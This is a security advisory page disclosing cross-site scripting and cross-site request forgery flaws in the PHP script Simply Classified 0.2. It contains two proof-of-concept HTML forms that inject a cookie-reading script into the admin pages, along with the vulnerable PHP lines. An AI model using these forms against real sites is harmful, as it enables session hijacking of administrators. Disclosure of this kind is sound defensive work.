|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 6934 CVE : GENERIC-MAP-NOMATCH SecurityRisk : Medium  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : Yes Exploit Available : Yes
Credit : mr_me Published : 10.01.2010
Advisory Content : ################################################################# # # Simply Classified 0.2 XSS & CSRF Vulnerabilities # Download: http://www.hotscripts.com/listing/simply_classifieds/ # Found by: mr_me # Tested On: Windows Vista # Note: For educational purposes only # Author contact date: 16th December 2009 # Advisory: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-0 02-simply-classifieds-v0.2-xss-and-csrf/ # Greetz to: corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team # ################################################################# |------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| ------------------------------------------------------------------- [+] 1st exploit: ------------------------------------------------------------------- <form name="new_category" action="http://[server]/classified/new_cats.php" method="POST"> <table align="center" width="550" border="0" cellspacing="1" cellpadding="1"> <tr> <input name="category" type="hidden" value="hacked" size="37" maxlength="30" /> </tr> <tr> <input name="description" type="hidden" value="<script>alert(document.cookie)</script>" size="40" maxlength="40" /> </tr> <tr> <input type="submit" name="Create" id="Create" value="Create" > </tr> </table> </form> ------------------------------------------------------------------- [+] Vulnerability details: ------------------------------------------------------------------- The author directly includes user controlled php variable into the HTML page ($ar and $description). edit_cats.php - line 86: <td align="center">Description: <input name="description" type="text" value="<?php echo "$description";?>" autocomplete="off" size="40" maxlength="40" /> </td> </tr> edit_adverts.php - line 120: <td colspan="2" align="center" style="font-size:14px"><?php echo "<b>$ar</b>"; ?> </td> In order to trigger the vulnerability, a user/admin must be tricked into clicking on a malicous url. This would allow a hacker to execute javascript code in the context of the user/admin and possibly gain administration access. ------------------------------------------------------------------- [+] 2nd exploit: ------------------------------------------------------------------- <form name="get_advert" action="http://[server]/classified/edit_advert.php" method="post"> <select name="advert_no" size="1"> <option value="<script>alert(document.cookie)</script>">editme :) <input type="submit" name="Go" id="Go" value="Go" > </form> References : http://securityreason.com/expldownload/1/7675/1 (Exploit)  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |